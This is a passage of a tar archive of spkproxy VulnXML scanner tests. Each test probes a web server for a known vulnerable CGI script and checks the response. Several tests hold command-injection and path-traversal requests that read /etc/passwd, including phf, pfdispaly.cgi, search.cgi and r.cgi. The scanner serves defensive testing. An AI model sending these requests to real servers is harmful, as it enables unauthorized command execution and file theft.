shell. Remove perl from the CGI dir." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}perl?-v HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1124.xml0100664000076500007650000000710307566204543021735 0ustar davedave (perlshop.cgi) "v3.1 by ARPAnet.com; check info in Phrack 55 by RFP" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}perlshop.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1125.xml0100664000076500007650000000723007566204543021737 0ustar davedave (pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|') "This allows attackers to execute arbitrary commands on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1126.xml0100664000076500007650000000725207566204543021744 0ustar davedave (pfdispaly.cgi?../../../../../../../../../../etc/passwd) "This allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pfdispaly.cgi?../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1127.xml0100664000076500007650000000723007566204543021741 0ustar davedave (pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|') "This allows attackers to execute arbitrary commands on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1128.xml0100664000076500007650000000706307566204543021746 0ustar davedave (phf) "Old and vulnerable? Or is someone messing with us...?" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}phf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1129.xml0100664000076500007650000000713107566204543021743 0ustar davedave (phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd) "C'mon 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1130.xml0100664000076500007650000000724707566204543021743 0ustar davedave (phf?Qname=root%0Acat%20/etc/passwd%20) "This allows attackers to read arbitrary files on the system and perhaps execute commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}phf?Qname=root%0Acat%20/etc/passwd%20 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1131.xml0100664000076500007650000000711407566204543021735 0ustar davedave (php-cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}php-cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1132.xml0100664000076500007650000000720307566204543021735 0ustar davedave (php.cgi?/etc/passwd) "This allows attackers to read arbitrary files on the system and perhaps execute commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}php.cgi?/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1133.xml0100664000076500007650000000710207566204543021734 0ustar davedave (plusmail) "This CGI may allow attackers to execute commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}plusmail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1134.xml0100664000076500007650000000724007566204543021740 0ustar davedave (pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00) "This CGI allows attackers to retrieve arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1135.xml0100664000076500007650000000712407566204543021742 0ustar davedave (pollssi.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pollssi.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1136.xml0100664000076500007650000000713007566204543021740 0ustar davedave (postcards.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}postcards.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1137.xml0100664000076500007650000000705007566204543021742 0ustar davedave (post_query) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}post_query HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1138.xml0100664000076500007650000000727207566204543021751 0ustar davedave (powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd) "The Powerup CGI allows attackers to read any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1139.xml0100664000076500007650000000712207566204543021744 0ustar davedave (ppdscgi.exe) "PowerPlay Web Edition may allow unauthenticated users to view pages." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ppdscgi.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1140.xml0100664000076500007650000000706407566204543021741 0ustar davedave (processit.pl) "This CGI returns environment variables 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}processit.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1141.xml0100664000076500007650000000712407566204543021737 0ustar davedave (profile.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}profile.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1142.xml0100664000076500007650000000704007566204543021735 0ustar davedave (pu3.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pu3.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1143.xml0100664000076500007650000000735207566204543021744 0ustar davedave (publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10) "AHG's search.cgi allows any command to be executed. www.ahg.com." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1144.xml0100664000076500007650000000720107566204543021736 0ustar davedave (query?mss=%2e%2e/config) "The Altavista search service allows attackers to read any file on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}query?mss=%2e%2e/config HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ MGMT_PW 200 MGMT_PW 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1145.xml0100664000076500007650000000735307566204543021747 0ustar davedave (quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=) "This CGI allows attackers to read arbitrary files on the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1146.xml0100664000076500007650000000714607566204543021750 0ustar davedave (quizme.cgi) "Mike's Quiz Me! CGI contained a bug which allowed arbitrary command exectution (version 0.5) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}quizme.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1147.xml0100664000076500007650000000725207566204543021747 0ustar davedave (r.cgi?FILE=../../../../../../../../../../etc/passwd) "The Powerup CGI allows attackers to read any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1148.xml0100664000076500007650000000705007566204543021744 0ustar davedave (ratlog.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ratlog.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1149.xml0100664000076500007650000000704607566204543021752 0ustar davedave (redir.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}redir.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1150.xml0100664000076500007650000000715407566204543021742 0ustar davedave (replicator/webpage.cgi/) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}replicator/webpage.cgi/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1151.xml0100664000076500007650000000705607566204543021744 0ustar davedave (responder.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}responder.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1152.xml0100664000076500007650000000706307566204543021743 0ustar davedave (retrieve_password.pl) "May not be vulnerable 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}retrieve_password.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1153.xml0100664000076500007650000000705007566204543021740 0ustar davedave (rguest.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rguest.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1154.xml0100664000076500007650000000702707566204543021745 0ustar davedave (rksh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rksh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1155.xml0100664000076500007650000000712007566204543021740 0ustar davedave (rmp_query) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rmp_query HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1156.xml0100664000076500007650000000705007566204543021743 0ustar davedave (robadmin.cgi) "Default password: roblog" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}robadmin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1157.xml0100664000076500007650000000712407566204543021746 0ustar davedave (robpoll.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}robpoll.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1158.xml0100664000076500007650000000707207566204543021751 0ustar davedave (rpm_query) "This CGI allows anyone to see the installed RPMs" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rpm_query HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1159.xml0100664000076500007650000000701107566204543021743 0ustar davedave (rsh) "Shell found" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rsh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 